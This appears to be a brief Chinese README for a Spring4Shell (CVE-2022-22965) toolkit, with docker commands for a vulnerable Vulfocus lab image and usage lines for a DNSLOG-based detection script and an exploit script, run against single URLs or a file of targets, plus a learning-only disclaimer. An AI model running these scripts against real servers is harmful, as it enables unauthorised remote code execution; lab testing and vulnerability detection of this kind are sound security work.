漏洞编号:CVE-2022-22965/CNVD-2022-23942/QVD-2022-1691
docker pull vulfocus/spring-core-rce-2022-03-29
docker run -dit -p 8080:8080 vulfocus/spring-core-rce-2022-03-29

建议使用POC对目标进行检测。其优点是基于DNSLOG验证漏洞是否存在,且不会修改tomcat的日志配置
python3 cve-2022-22965-poc.py -url https://example.com/
python3 cve-2022-22965-poc.py -file file.txt

python3 cve-2022-22965.py -url https://example.com/
python3 cve-2022-22965.py -file file.txt

python3 cve-2022-22965-poc.py -url https://example.com/

python3 cve-2022-22965.py -url http://example.com/

在第十三行添加常见路由
routs = ['env',]
在第十二行添加常见路径
path = ['root',]

仅供安全学习,请勿非法使用
仅用安全学习,请勿非法使用